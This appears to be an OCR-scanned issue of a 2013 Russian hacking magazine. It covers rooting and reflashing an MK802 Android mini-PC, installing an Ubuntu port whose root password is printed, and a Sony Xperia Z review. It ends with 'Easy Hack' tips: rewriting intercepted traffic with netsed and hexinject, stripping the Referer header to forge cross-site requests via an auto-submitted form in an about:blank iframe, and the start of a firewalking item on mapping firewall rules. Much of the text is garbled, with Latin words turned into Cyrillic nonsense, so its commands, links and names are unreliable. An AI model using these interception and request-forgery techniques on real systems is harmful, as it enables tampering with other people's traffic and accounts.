вер и в самом рутинге не нуждается. Единственное, что придет- 
ся сделать, — это скачать приложение для управления со сто- 
роннего сайта ( сюо.аІ/ѴѴОгОЛ и самостоятельно установить 
на управляющее устройство (смартфон или планшет). 

Пульт включает в себя четыре основные функции: тачпад 
(удаленная мышь), удаленная клавиатура, управление медиа- 
плеером и навигация (кнопки вверх, вниз, влево, вправо, домой, 
назад, поиск и так далее). В общем и целом приложение очень 
неплохое, хотя и уступает ОгоісІМоІе, которое и работает лучше, 
и включает в себя джойстик. С другой стороны, за ОгоісіМоіе 
придется заплатить, да еще и получить права гоо! перед этим. 
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3. После окончания процесса установки карту следует вынуть 
и удалить с нее файл, иначе после ее повторного втыкания 
девайс опять попробует обновиться. 



Еще один интересный вариант — это использовать раз- 
личные ВІиеІооІН-мыши, клавиатуры и джойстики. Начиная 
с МК802 III устройство поддерживает синий зуб, так что все 
это будет работать без всяких проблем. Кстати, чтобы при ис- 
пользовании различных 115В или любых удаленных клавиатур 
на экране не появлялась стандартная клава АпбгоісІ, можно 
установить N11 И КеуЬоагб из маркета. Это такая заглушка, 
встающая на место нормальной клавы. Перед использовани- 
ем следует активировать через «Настройки — > Язык и ввод — ► 
По умолчанию». 

ПРОВОДНОЙ ИНТЕРНЕТ 

В том случае, если по каким-то причинам у тебя нет ѴѴі-Рі (что 
очень странно в 2013 году), устройство вполне себе можно 
вывести в интернет, используя переходник 118В — РІ645, При- 
обрести такой можно опять же в любом китайском интернет- 
магазине за 3-4 доллара (например, тут: сюо.аІ/Ф.ѵс . }, ну или 
в компьютерном магазине, переплатив в три раза. 

В любом случае переходник достаточно воткнуть в УЗВ- 
порт, включить в настройках опцию Еійеігпеі, и, если на другом 
конце есть РИСР-сервер, уже через несколько секунд система 
будет в интернете. Если же используется статическая настрой- 
ка, то в той же опции ЕІИегпеІ для этого есть пункт «Зіаііс ІР 
ЗеШпдз», где можно самостоятельно прописать ІР, адрес шлюза 
и ЭМЗ-сервера. 

И СНОВА КООТ 

Хотя МК802 можно использовать без гооі и установки сторонних 
прошивок, последние открывают гораздо больше интересных 
возможностей. Так, имея гооі, можно отключить показ нижней 
строки управления, которая на телевизоре практически лишена 
смысла, активировать режим отладки (АОВ) по ѴѴі-Рі, позволя- 
ющий без лишних усилий перекидывать на устройство файлы, 
делать резервные копии приложений, синхронизировать дан- 
ные приложений (что очень удобно использовать для обмена 
сохранениями в играх), а также много чего другого. 

Как и в случае с любым другим Апб го іб -девайсом, есть три 
пути получить гооі на МК802: это воспользоваться эксплойтом, 
прошить обновление с рутом либо установить уже рутован- 
ную кастомную прошивку. В следующем разделе я расскажу 
об установке прошивки Ріпіезз НОМ, а сейчас объясню, как об- 
завестись рутом на МК802 Ш. 

Самый простой и незамысловатый способ сделать это 
установить специальным образом подготовленное обновле- 
ние, которое добавит в систему команду /зузІепл/Ьіп/зи и при- 
ложение ЗирегІІзег, обеспечивающие доступ к полномочиям 
суперпользователя. Для этого достаточно выполнить три про- 
стых шага: 

1 . Скачать файл ирбаіе.гір ( ю.оі/с ЬЬРЕ ) и положить его в ко- 
рень любой имеющейся карты памяти. 

2. Воткнуть карту памяти в устройство, после чего на экране 
должно появиться сообщение об обновлении, за которым 
последует перезагрузка и установка прошивки. 



После перезагрузки прошивка будет рутована, и ты смо- 
жешь воспользоваться приложением ІиІІІзсгееп для сокрытия 
строки состояния, ѴѴіРі АОВ для доступа к АОВ через беспро- 
водную сеть, РРР ѴѴІсІдеІ для простого подключения к инету 
через ЗС- модем, а также получишь возможность использовать 
девайс как сервер (об этом позже). 

ПРОШИВКИ 

Система на кристалле ВК3066 и ее более поздние моди- 
фикации, на которых базируется МК802 начиная с версии 
III, отличается тем, что производитель не открывает ЗЭК 
на свое железо. Из-за этого процесс портирования других 
ОС существенно затрудняется, и сборок, например, того же 
СуаподепМоб для устройств на базе ВК3066 найти невозмож- 
но. Остается довольствоваться модификациями стандартной 
прошивки от производителя. Наиболее интересной из них 
я бы назвал прошивку Ріпіезз НОМ, подходящую для МК802 III 
и аналогов. От стоковой она отличается следующими возмож- 
ностями: 

• Автосокрытие строки состояния при запуске любого прило- 
жения. Очень удобная функция, доступна через меню: «На- 
стройки — ► Экран — > Аиіо Нісіе Зузіет Ваг». 

• Возможность включения экрана блокировки. Функция по- 
лезна тем, что позволяет задать пин-код, чтобы никто, кро- 
ме тебя, не смог воспользоваться Зтагі ТѴ. 

• Автоматический уход в сон с гашением экрана. Срабатывает 
через определенный промежуток времени после прекраще- 
ния любой сетевой активности. Включается в «Настройки — ► 
Экран — > Спящий режим». 

• Поддержка определения местоположения по ІР-адресу. По- 
зволяет, например, получать более точные результаты по- 
иска или корректно работать приложениям, отображающим 
погоду и другие геозависимые данные. 

• Фикс проблемы совместимости с играми от ѲатеІоЙ, от ко- 
торой страдают почти все девайсы на НК3066. 

• Поддержка аппаратного декодирования видео в ХВМС. 

■ Совместимость с джойстиком от ХЬох, 

Однако самое главное — это полноценная поддержка вывода 
видео в разрешении 1080р. Дело в том, что, хотя МК802 и под- 
держивает вывод в этом разрешении, АпбгоісІ так или иначе 
оперирует картинкой 720р, а при отправке на экран масшта- 
бирует ее до 1080р. В результате при близком рассмотрении 
на РиІІ НЮ экранах изображение выглядит нечетким, а текст 
на белом фоне становится трудно читать. 

Производитель сделал это намеренно, потому что с рабо- 
той в режиме 1080р устройство справляется с большим тру- 
дом, из-за чего АпбгоісІ начинает притормаживать, игры лагать, 
а видео в 1080р так нагружает устройство, что оно может про- 
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Процесс прошивки МК802 III с помощью 
утилиты КосксНір ВаісЬ Тооі напоминает 
какой-то нелогичный к вест из плохой игры 



сто сгореть. Если тебя это не напрягает, в комплект Ріпіезз РОМ 
включено Ри!І НО ядро, которое можно выбрать при загрузке. 

Как и все остальные девайсы на РК3066, МК802 N1 прошива- 
ется с помощью фирменной утилиты РосксМр ВаІсИ Тооі, а сам 
процесс прошивки напоминает какой-то нелогичный квест 
из плохой игры. В общем и целом делается это так: 

1 . Подопытный девайс обесточиваем, а кабель питания втыка- 
ем в боковой ОТО -разъем вместо заднего. Обратный конец 
кабеля втыкаем в комп. 

2. На компе загружаем ѴѴіпбоѵѵз и скачиваем архив с прошив- 
кой и всеми необходимыми инструментами ( аоо.аІ/РІ5І .[і ). 

3. Архив распаковываем, куда угодно, и запускаем содержа- 
щийся в нем файл РОМ РІ_азІі ТооІ.ехе, который выводит 
на экран окно, где должна появиться надпись «N 0 Роипб 
РКАпсігоісі госк 115В». 

4. В настройках девайса активируем режим доступа к нако- 
пителю с помощью «Настройки — > Память — * Меню —* Мазз 
Зіогаде». 

5. После этого в РОМ РІазИ Тооі должна появиться надпись 
«Роипб РКАпсігоісі Мазз Зіогаде ІІЗВ». Если это так, нажима- 
ем на кнопку «РеЬоо! Іо РІазіі Мобе». 

6. Девайс перезагружается и после этого появляется в диспет- 
чере устройств ѴѴіпсІоѵѵз как неизвестное устройство. Чтобы 
исправить это, следует перейти в диспетчер устройств, 
найти устройство с именем типа РКЗО, помеченное желтым 
восклицательным знаком, открыть его и нажать кнопку «Об- 
новить драйвер». Далее следует указать для поиска драйве- 
ра папку с распакованным Ріпіезз РОМ, в ней х32 или х64, 
в зависимости от разрядности ОС, и уже там нужную ОС (ХР, 
Ѵізіа...). Винда установит драйвер и предложит перезагру- 
зиться. Соглашаемся. 

7. После перезагрузки вновь запускаем РОМ РІ_азИ ТооІ.ехе, 
ждем появления надписи «Роипб ПКАпбгоіб Мазз Зіогаде 
ІІЗВ». Опять жмем «ПеЬооПо РІазН Мобе», ждем появления 
той же надписи, после чего жмем «Егазе ЫАІ\Ю (ЮВ)», чтобы 
стереть все, что есть на устройстве, 

8. (Опциональный шаг) Если требуется РиІІ РЮ ядро, находим 
в верхнем списке прошиваемых компонентов кегпеІ720.ітд 
и переименовываем в кегпеІ1080.ітд. 

9. Жмем «Ріазб РОМ» и ждем окончания прошивки. 

10. Ждем полной загрузки системы. 

Если система не загружается, повторяем последние четыре 
шага. 



СЕРВЕР 

Замечательная черта МК802 — подключать РЮМІ для работы 
необязательно. Эта особенность, в сочетании с крошечными 
размерами самого устройства, превращает МК802 в заман- 




ѴѴАІШШС 

При активации спящего 
режима в Ріпіезз КОМ 
не забудь включить 
в настройках ѴѴі-Рг 
постоянное подклю- 
чение ксети, иначе 
сразу после засыпания 
устройства ты потеря- 
ешь с ним связь. 



При установке Ріоиліи 
необходимо прошить 
ядро в раздел гесоѵегу 



Ркигсіи КегпеІ Ігь&аІІег ѵі.35 
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МШ НАѴЕ 

СОФТИН ДЛЯ МИНИ-ПК 



• ѴРІауег — один из лучших видеоплееров 
для Апбгоіб. Играет все и задействует аппарат- 
ное ускорение. 

• Типеіп Набіо — лучшее приложение для про- 
слушивания опііпе-радио. Семь тысяч станций 
и огромное количество подкастов на любой вкус 
и цвет. Отлично вписывается в телевизор. 

• 500рх — один из самых известных файловых об- 
менников для профессиональных и претендую- 
щих на это звание фотографов. Огромный склад 
потрясающих высококачественных фотографий. 
В случае с ТВ-приставкой приложение интерес- 
но в первую очередь возможностью включить 
слайд-шоу. 

• ХВМС — не нуждающийся в представлении ме- 
диацентр для Ыпих и Апбгоіб. Превращает мини- 
ПК в полноценную мультимедийную станцию 
для прослушивания музыки, просмотра теле- 
передач и фильмов. Интересен огромным коли- 
чеством поддерживаемых источников мультиме- 
диаконтента. 

• 01. РМ - известное в кругах любителей элек- 
тронной музыки интер нет- радио с десятками 
жанровых каналов и эксклюзивными шоу от Мар- 
куса Шульца и других именитых личностей. К со- 
жалению, за качественный звук придется платить 
3 доллара в месяц. 

• іѵі.ги — один из наиболее известных легальных 
интернет-кинотеатров в России с «оплатой» про- 
смотром рекламы. Имеет подозрительно каче- 
ственное клиентское приложение, которое про- 
сто идеально вписывается в экран телевизора. 
С другой стороны, выбор фильмов не такой уж 
большой. 

• ѴКРІауег — плеер медиаконтента из социальной 
сети «ВКонтакте». Вписывается в экран телеви- 
зора гораздо лучше официального клиента. 

• РгоібМоІе — лучший пульт управления андро- 
идом с помощью андроида. Минуса два: гооі 
и цена 2 доллара за сервер. 

• Ррзе — лучший эмулятор РІауЗіаІіоп. 

• РозВох ТигЬо — лучшая, но платная версия эму- 
лятора ООЗВох для Апбгоіб. Ностальгирующие 
могут поиграть, например, в Х-СОМ и Мазіег оТ 
Огіоп 2. 
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Зегѵегз ІШітаІе полностью интегрируется 
в АпйгоШ и позволяет запускать серверы 
при загрузке или возникновении событий 



чивого кандидата на роль домашнего энергоэффективного 
и очень неплохого по характеристикам сервера. Остается ре- 
шить одну проблему — АпсІгоісІ непригоден для выполнения по- 
добных задач. 

Самый простой способ сделать это — установить приложе- 
ние Зегѵегз Шітаіе из маркета. Это ни много ни мало сборник 
из около 40 различных серверов и 14 сетевых утилит для мони- 
торинга и управления. Приложение позволяет запускать такие 
серверы, как ЭНСР, 0ІМ5, СѴ5, РТР, МуЗОЦ НТТР, РНР, XII, ЗМВ 
и даже Зіух. Причем это не просто сборник серверов в красивой 
графической оболочке, которые можно только запустить и оста- 
новить со стандартными настройками. Для каждого сервера 
реализован графический интерфейс настройки, позволяющий 
изменить множество опций. Оптимизированный пдіпх с НиЬу 
оп Яаііз таким образом, конечно, не настроишь, а вот запустить 
свой собственный РТР- и ЗМВ-сервер для расшаривания фай- 
лов с подключенного по УЗВ жесткого диска очень даже можно. 
Зегѵегз Ііііітаіе полностью интегрируется в Апсігоісі и позволяет 
запускать серверы при загрузке либо возникновении событий, 
просматривать состояние серверов и логи с помощью удобного 
интерфейса и многое другое. В общем, просто мечта, вот толь- 
ко стоит это все — даже с учетом сезонного снижения цены — 
10 долларов. Бесплатная версия позволяет запускать только 
два сервера одновременно, да и то в течение 14 дней (ТгіаІ). 

Впрочем, в маркете можно найти и множество других, в ос- 
новном менее качественных оберток для запуска серверов. 
Тот же сігоісіззИсі для ЗЗН, например. При наличии гооі также 
можно воспользоваться инструментами для установки Ыпих- 
дистрибутива, такими как Ыпих йеріоу, и устанавливать необхо- 
димые серверы уже в него. Еще более интересный вариант — 
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это инструмент ВоІВгеѵѵ (. _ і... сопл ), который позволяет 
устанавливать Ыпих -софт, в том числе Арасбе и ЗатЬа, прямо 
в Апсігоісі. Кстати, в следующем выпуске журнала о нем будет 
отдельная статья, не пропусти. 

Ну и самый верный вариант — это установить на устройство 
настоящий дистрибутив Ыпих. 



ІШІЛГШ 

Несмотря на отсутствие сколько-нибудь нормально работа- 
ющих прошивок на базе СуаподепМосІ, для МК802 III и клонов 
вполне себе существует качественный и полностью работоспо- 
собный порт ІІЬипШ 12.10, да еще и устанавливаемый как аль- 
тернативная ОС рядом с основной (сосІе.сюоаІе.сот/р/гкЗОбб- 
Ііпих У. Фактически это означает, что МК802 может быть очень 
неплохим тонким клиентом, сервером или простым ПК для це- 
лей типа «зайти проверить почту» или «посмотреть котиков в ин- 
тернете». Для цены в 60 долларов это очень и очень неплохо. 

Сама установка включает в себя два шага: первый — про- 
шивка альтернативного ядра в гесоѵегу-раздел устройства 
и второй — установка самой системы на флешку или ЗЭ-карту 
(понадобится карточка размером не меньше 4 Гб). Для прошив- 
ки ядра мы воспользуемся уже знакомым по установке прошив- 
ки РіпІезз НОМ инструментом НОМ РІ_азб ТооІ.ехе. Скачиваем 
ядро ( .дІ/иХОВ: ), запускаем НОМ РІ_азІі ТооІ.ехе, но в этот 
раз в верхней части окна снимаем галочки со всех полей, кроме 
шестого (гесоѵегу), нажимаем на последнее поле и выбираем 
ранее скачанный файл. Нажимаем «РІазб НОМ». Это все. 

Чтобы установить сам дистрибутив 1/ЬипІи на карту памяти, 
загружаемся в 1_іпих на настольной машине (без него никак), 



скачиваем скрипт рге-рісипЩ.зб ( 



Но Г 



), запускаем: 



Ьазіт рге^рісипби. зИ 



и следуем инструкциям. Как вариант, установку можно выпол- 
нить самостоятельно. Для этого нужно создать на карте памяти 
ехН-раздел с именем Ііпихгооі, а затем распаковать в него ар- 
хив с системой { і оо.а І/ѵОКс- . ). Далее вставляем карту памяти 
в устройство и перезагружаем в режим гесоѵегу одним из двух 
способов на выбор: 

1 . С помощью приложения ВеЬооІ в РіпІезз ВОМ. 

2. Выполнив команду «зи && геЬооІ гесоѵегу» в терминале 
Апсігоісі (нужен гооі). 

После этого система перезагрузится в Шипіи. Если все ОК, 
появится окно логина, пароль для гооі — 12д\л/азгх. Чтобы вер- 
нуться обратно в Апсігоісі, просто перезагружаем устройство 
любым способом (хоть выдернув кабель питания). 

ВЫВОДЫ 

МК802 — прекрасное устройство, которое с лихвой отбивает 
свою цену. При должном уровне знаний и терпении его можно 
заставить делать абсолютно все, начиная от проигрывания ин- 
тернет-радио и заканчивая хостингом файлов. Его можно пре- 
вратить в тонкий клиент или купить Віиеіооіб-джойстик и играть 
в игры. Несмотря на свое китайское происхождение и смешную 
цену, оно практически не имеет конструктивных проблем и мо- 
жет работать неделями напролет. ДС 
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ОБЗОР 50ІЧѴХРЕВІА 2 



Формула модельного ряда 
Зону прошлого года сводилась 
к тому, чтобы играть на других 
брендах компании: РІауЗШІіоп, 
Вгаѵіа, ѴѴаІкплап и прочих. Увы, 
даже у флагманского Хрегіа 
5 на момент выхода было до- 
статочно невзрачное железо 
и устаревшая версия АпсІгоісІ. 
Кажется, что с Хрегіа 2 . компания 
прислушалась: здесь и мощное 
железо, и несколько собствен- 
ных фишек. Хватит ли их? 




Александр Расмус 
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В КАЖДОЙ ДЫРКЕ ЗАТЫЧКА 

Дизайн модели проще всего охарактеризовать 
одним словом — симметрия. На выбор пред- 
лагается сэндвич из стекла и пластика белого, 
черного или фиолетового цвета. Единственный 
выступающий элемент — кнопка включения и ка- 
челька громкости. Ключевой момент — водоне- 
проницаемость. Чтобы защитить смартфон, $опу 
пришлось прикрыть шторками все отверстия. Это 
выглядит удачно с учетом общего минимализма, 
но пострадала эргономика. Например, чтобы под- 
ключить наушники или 118В, придется нащупы- 
вать и открывать дверцу. Сами шторки, впрочем, 
кажутся надежными. 

Для флагманского устройства компания вы- 
брала аж пятидюймовый экран с разрешением 
РиІІ РЮ — это аналогично топовым моделям кон- 
курентов, НТО ВиДег^у и Затзипд Саіаху 34. Та- 
ковы тенденции — выпустить флагман с экраном 
меньше 4,5 дюйма сейчас не решается ни одна 
компания. «Лопатообразность» компенсирует- 
ся тонкостью (7,9 мм), но одной рукой с Хрегіа 2 
работать все равно неудобно. Опять-таки разре- 
шение в 1080р дает экрану плотность примерно 
440 точек, что почти на треть выше, чем у Веііпа- 
экрана у ІРМопе. Считать это полезной особен- 
ностью сложно, тем более что других достоинств 
у экрана нет — подкачали яркость и углы обзора. 

Отдельно стоит отметить звук. С одной сто- 
роны, в комплекте с Хрегіа 2 идут прекрасные 
наушники — особенно если сравнивать с тем, 
что обычно идет в комплекте с техникой Арріе. 



С другой — звук из динамиков очень грязный, 
и посторонние шумы заметны даже на мелоди- 
ях звонка и оповещениях. Досадно — все-таки 
на таком экране вполне логично смотреть если 
и не кино, то хотя бы ѴоиТиЬе, 

Наконец, в смартфоне установлены две ка- 
меры. Разрешение матрицы фронтальной каме- 
ры составляет 2,2 Мп, поддерживается РиІІ НО. 
В тыльной камере установлен сенсор на 13,1 Мп. 

ДОРВАЛИСЬ 

Начинка у Хрегіа 2, в отличие от прошлогоднего 
флагмана, вполне актуальная: четырехъядерный 
процессор Оиаісотт Зпарбгадоп, работающий 
на частоте 1 ,5 ГГц, 2 Пб оперативной памяти, 16 Пб 
встроенной памяти. Хранилище расширяется 
как за счет карт тісгоЗО, так и за счет подклю- 
чения внешних накопителей через переходник 
115В — ОТС. Сильной стороной смартфона явля- 
ется поддержка НЕ — хотя сейчас это скорее за- 
дел на будущее, ведь сети четвертого поколения 
еще не очень развиты в России. 

Впрочем, на фоне остальных флагманов это- 
го года Хрегіа 2 не выделяется. Такой же чипсет 
используется в НТО ВиДегТІу и ЕС Орііпгшз С, чуть 
более мощный ( 1 ,7 ГГц) — в НТС Опе. Выбивается 
разве что Затзипд Саіаху 34 с восьмиядерным 
процессором. Большинство аппаратов оснащены 
РиІІ НЮ экранами (кроме Орйгтшз С с разреше- 
нием в 720р), диагональ в большинстве случаев 
тоже составляет пять дюймов (кроме Орііплиз 
С и Опе). Таким образом, Хрегіа 2 не лидиру- 



ет по характеристикам — флагманы в этом году 
на редкость однообразные. Значит, выделяться 
нужно функциями. Получается ли это? 

ІГ8А80ІІѴ 

Японцы не стали ковыряться в АпсІгоісІ так силь- 
но, как это делают, например, Затзипд или 
НТС. Изменения в основном коснулись интер- 
фейса — Зопу попыталась привнести элементы 
из РІауЗШііоп и других своих продуктов. Получи- 
лось не очень гармонично. Плоский и абстракт- 
ный дизайн Ноіо плохо сочетается с объемными 
иконками и панелями, использованными Зопу. 
В фирменном медиаплеере ѴѴаікт ап вообще ре- 
шили использовать фотографии для обозначения 
секций, что резко выбивается из общей стилисти- 
ки АпсІгоісІ. В этом смысле японским дизайнерам 
стоило бы посмотреть на НТС Зепзе, в котором 
визуальных изменений тоже много, но они все- 
таки сочетаются с Ноіо. Кроме того, УІ от Зопу 
не лишен собственных багов — например, край- 
не раздражает автокоррекция, срабатывающая 
при заполнении служебных полей в приложениях 
вроде логина или адреса электронной почты. 

Функций разработчикам удалось добавить 
не так уж и много. Самая заметная и полезная — 
Зіатіпа Мобе. По умолчанию смартфон работает 
от батареи не больше суток при активном ис- 
пользовании — что ожидаемо при таком экране. 
Зіатіпа Мобе переводит смартфон на «спартан- 
ский» режим, отрубая мобильный интернет, ѴѴі-Рі, 
ВІиеІооІІт и фоновую работу приложений. По заяв- 
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По умолчанию режим энергосбережения убивает 
любую фоновую активность приложений, но можно 
составить список исключений 



лениям разработчиков, такая функция увеличива- 
ет время работы смартфона в четыре раза, и это 
похоже на правду. Впрочем, понятно, что никто 
не будет четыре дня использовать телефон за 30 
тысяч в режиме бабушкофона, но в экстренных 
ситуациях такая функция придет на помощь. Кро- 
ме того, у ЗЕапліпа Мобе отличные настройки — 
можно определить, что именно нужно отключить, 
а также составить белый список приложений, ко- 
торые продолжат свою работу несмотря ни на что. 

Другая интересная функция — ЗтагЕ СоппесЕ. 
В этом приложении можно создавать сценарии, 
автоматически выполняющиеся при подклю- 
чении внешнего устройства. Например, можно 
придумать сценарий, при котором при подклю- 
чении наушников сразу же будет включаться ау- 
диоплеер. Можно запустить любое приложение, 
отправить сообщение, сделать чекин в РасеЬоок 
и так далее. А вот список условий довольно огра- 
ничен — действия осуществляются при обнару- 
жении устройства по ВІиеЕооФ или ѴѴі-Рі (очевид- 
но, в первую очередь это колонки), подключении 
наушников или зарядника, а также по таймеру. 
В таком приложении было бы логично добавить 
триггер по местонахождению или хотя бы по под- 
ключению к конкретной ѴѴі-Рі-сети. Функция дей- 
ствительно интересная, но возможностей у нее 
сейчас мало. Впрочем, в Ооодіе Ріау достаточно 
других автоматизаторов, например Тазкег ( ;- оо. 



Заманчиво звучит описание функции Хрегіа 
І_іпк: между смартфоном и планшетом можно 
создать подключение, которое будет исполь- 
зоваться для тетеринга, а также оповещений 
о звонках и сообщениях на экране планшета. 
Увы, работает это только с планшетами 8опу, 
поэтому протестировать не удалось. Тетеринг 
в данном случае имеет смысл. Да, у владельца 



смартфона за 30 тысяч, скорее всего, и план- 
шет подключен к мобильному интернету, но вот 
поддержки НЕ там, скорее всего, нет. Да и идея 
с оповещениями на планшете тоже довольно 
удачна. Жаль только, что приложение доступно 
лишь на устройствах Зопу. 

Наконец, в Хрегіа 2 . реализована популярная 
сейчас идея мини-приложений. Производители 
Апбгоіб-смартфонов вообще в последнее время 
любят экспериментировать с маленькими ап- 
пами, и мне кажется, что это довольно странная 
затея, — слишком уж мало понятных сценариев, 
в которых не было бы проще и удобнее просто 
переключиться на полнофункциональное прило- 
жение. 

На этом идеи инженеров Зопу, увы, закончи- 
лись. Есть несколько фирменных приложений, 
вроде ѴѴаІктап (довольно базовый аудиопле- 
ер с эквалайзером) и ТгаскЮ (аналог ЗИагагп 
и ЗоипбНоітб), непонятного социального агре- 
гатора ЗосіаііЕе, предустановленного антивируса 
от МсАЕее и офисного пакета. В общем, все полу- 



чилось не так аккуратно, как у НТО, и не так функ- 
ционально, каку Заплзипд. 

ОСТАЕМСЯ НА ТРЕТИЙ ГОД 

С флагманами этого года получилась интересная 
ситуация. По многим параметрам производители 
уже прошли все границы разумного: экраны с ма- 
трицей 1080р (хотя уровень ВеЕіпа был достигнут 
с 720р уже давно), четырехъ- и восьмиядерные 
процессоры (что вообще смех), пятидюймовые 
экраны. Ни одна из этих вещей на самом деле 
не производит впечатления. 

Зопу в данном случае постаралась оказаться 
«в теме» и сделала телефон с такими же харак- 
теристиками. В итоге получился очень крупный 
аппарат со спорным экраном и звуком и неболь- 
шим количеством программных фишек. В плюс 
можно записать действительно крутой дизайн 
железа и защиту от воды (впрочем, сомневаюсь, 
что для кого-то это стало бы решающим факто- 
ром). Это лучший аппарат, вылущенный Зопу, 
но его опять оказалось недостаточно. 3 С 
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Все описанные програм- 
мы со всей рубрики иіди 
на диске 



ПОДМЕНИТЬ ТРАФИК НА ЛЕТУ 



РЕШЕНИЕ 

Очень распространенная задачка, которая возникает при анализе работы 
какого-то протокола или при проведении атак, — это подменить в переда- 
ваемом трафике данные. Есть, например, клиентская программка, которая 
коннектится к серверу, и у них происходит обмен данными. Ну а нам надо 
что-то в них поменять. Решений, конечно, масса. Например, ЕМегсар и его 
фильтры (о которых я писал года три назад) или классический ТСР-прокси. 

Хотя самым быстрым решением будет тулза пеізесі (автор которой Ми- 
хал Залевский). Плюс ее (кроме того, что она входит в поставку с ВаскТгаск) 
в том, что она проста. По сути, это мини-портфорвардер с функцией под- 
становки строк. 

Все, что требуется, — указать в консоли: протокол, локальный порт, ІР 
удаленного хоста, удаленный порт, а далее — набор правил (одно или не- 
сколько). Например: 

пе'СзесІ 'Сер 8080 1 92.168 . 0. 1 80 ' 5/ѵісСіт/Маске(Л/2 ' 

Здесь мы указываем, чтобы программка слушала 8080-й порт и пере- 
правляла данные на сервер на 80-й порт, заменяя в первых двух пакетах 
строку ѵісііт на баскесі. 



Как уже говорилось, правил может быть много, применяются они после- 
довательно и, что самое приятное, можно менять и бинарщину. Для этого 
надо указать подменяемые данные в урленкоженном виде (%+НЕХ). Напри- 
мер: 

пефзегі 1:ср 8080 192.168. 0. 1 80 ' 5/%00/%-рРІ. ' 5./%01%02%03/«-* 
%0Ѳ%00%00 ' 



Очень удобно и прикольно получается. Единственная приличная пробле- 
ма в том, что если подменяемая строка меньше/больше исходной, то может 
разойтись размерность пакетов и они будут некорректно обработаны (но 
это зависит от протокола). 

Еще одним решением, чем-то похожим, будет тулза Нехіпіес* ( ю.рі/ 
РБ ), Но по использованию она заметно отличается. В ней разделены 
функции сниффера и функции инжектора. То есть для того, чтобы выпол- 
нить первую задачу замены строки, надо будет сделать примерно следу- 
ющее: 



Ьехіп^есЕ -5 ^і_ еііИѲ -с 2 | геріасе ' 76 69 63 74 69 6сІ ' <-■ 
'68 61 63 6Ь 65 72' |_ Мехіпзесб ^р -_і е-ЫтѲ 



і/репІезТ/зпИТегз/НехіпзесТ# 

огідо.Ии 

ѵ/ш.огідо.Ьи 

5ТаТіс1.огідо5.Ьи 

5І:а1:іс5.огідо5.Ьи 

5Та1;іс5.огідо5.Ьи 



Ьехіп]ес1: -5 -1 еТЬѲ -г , зігіпдз дгер НобТ 




Вынимаем из трафика 
все заголовки Нові 



Итог последовательно 
сти "есИо 01 02 03 04' 
Иехіп]есі-р -і еІНО" 



Здесь первый Нехіщесі: соснифает пер- 
вые два пакета трафика на интерфейсе 
еіНО и далее передаст данные стандартной 
команде геріасе. Она заменит строку и за- 
пустит бехіп)ес1, но уже на инжект данных. 
Вообще, в данном случае возможностей 
у нас существенно больше, так как есть все 
возможности внешних команд и тулз, а они 
в піх’ах очень широки. Вероятно, поэтому 
она попала в новую версию ВаскТгаск — 
в Каіі 1_іпих, 

Кроме того, приличный плюс еще есть 
в том, что мы можем, используя параметр 
указывать классические рсар- фильтры для 
перехватываемых данных. Например, «[юз! 
192.168.0.100 апсі рогі 80» позволит нам ви- 
деть только НТТР-трафик с определенным 
хостом. 

Кроме того, Нехіпіесі имеет возможность 
работать с чистым ѴѴі-Рі-трафиком, а также 
с 118В. Подход к ним аналогичен. И мне ка- 
жется, что это шикарно :). 
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Создаем фрейм 9 добавляем формочку с автоотправкой, и бац — запрос без НеТегег 



РЕШЕНИЕ 

В прошлый раз мы обсудили один из видов иаѵаЗсгірІ 
Нііаскіпд’а (с саІІЬаск’ами), и там был пример с таіі.ги. Как 
было отмечено, защита у них внедрена с помощью проверки 
заголовка Веіегег. В данном заголовке твой браузер указы- 
вает, с какого сайта ты перешел на другой сайт. МаіІ.ги, видя, 
что запрос на получение данных инициирован с чужого для 
них поддомена, ничего дельного не отдает. Как было сказа- 
но, использование данного метода не очень хорошая прак- 
тика. Один из методов обхода мы как раз и обсудим сейчас. 

Метод обхода проверки Ве^егег заключается в том, чтобы 
совсем убрать данный заголовок из запроса. Казалось бы, для 
разработчика все просто: нет заголовка — отвергай запрос. Но 
не тут-то было. Кроме того что, например, есть аддоны к бра- 
узерам, которые чистят данное поле (Вѳ^егег, как ни странно, 
приличная утечка приватной информации для пользователей), 
есть еще и закладки, и прямые ссылки, переходя по которым 
браузер пользователя не добавляет данный заголовок, так 
как предыдущего места и не было. Все это приводит к тому, 
что разработчики систематически разрешают, а точнее, об- 
рабатывают запросы с отсутствующим заголовком РеТегѳг так, 
будто он верный. Хотя пример из прошлого номера про таіі. 
ги не таков (у них — без геТегег == некорректный геіегег), стоит 
отметить, что они были уличены в такой баге, но в несколько 
другом сервисе. 

К чему это я? А к тому, что это — распространенная уяз- 
вимость. ОК. Важность понятна, задача тоже ясна — заста- 
вить сделать браузер жертвы запрос на какой-то ресурс, 
но без заголовка. Как это провернуть? Есть ряд различных 
методов, во многом браузерозависимых, но я приведу пару 
универсальных. 

Первый основывается на попытке повысить приватность 
в браузерах для НТТРЗ-соединений. Все браузеры, когда пользователь за- 
ходит на сайт по НТТРЗ, не передают заголовок Неіегег на другие сайты. 
В другую же сторону, с НТТР на НТТРЗ, заголовок есть. Таким образом, для 
проведения атаки нам надо поднять веб-сервер с НТТРЗ и заманить на него 
жертву — запрос, посланный с него, будет чист. 

Второй способ основывается на том, откуда получаются данные для за- 
головка. Если не было исходного сайта, то и посылать нечего. Идея в своей 
основе прекрасна, работает во всех браузерах и нова. Легче всего понять ее 
будет по исходничку (доо.дІ/ПКхАу): 
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'кз-при! ѣуре=|іі<і<2еп пате=аааа ѵа1ие=Наскте />' + 

< /То пт > ' ; 
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</Ьо<2у> 

</Ыгп1> 

В общем-то, тут, несмотря на объем кода, все просто. Самая главная 
фича способа — іТгате с «аЬоіЩЫапк». Породив его, мы получаем возмож- 
ность избавиться от Веі'егег нашего сайта. Далее же мы запускаем функ- 
цию Іоаб, а она, в свою очередь, создает формочку (розМаШ) для генера- 
ции необходимого нам запроса. После эта формочка пихается все тем же 
^ѵаЗсгірІ’ом в первый фрейм, который «аЬоіЩЫапк», и эмулируется под- 
тверждение отправки данных. Все, данные отправились, а лишний для нас 
заголовок — нет. 



ОПРЕДЕЛИТЬ ПРАВИЛА ФИЛЬТРАЦИИ ФАЙРВОЛА 



РЕШЕНИЕ 

Данная задачка относится к теме сбора данных о цели и сегодня скрыва- 
ет за собой такую технику, как ^ігеіл/аікіпд. Те, кто достаточно бородат, могут 
пропустить ее, остальных же прошу к столу :). 

Итак, представим, что мы желаем проникнуть из интернета в сеть 
какой-то организации. У нее есть некие серверы, которые доступны 
из инета, но есть и файрвол где-то между нами и серверами. Так вот, пра- 
вила фильтрации этого файрвола мы и можем определить, используя эту 
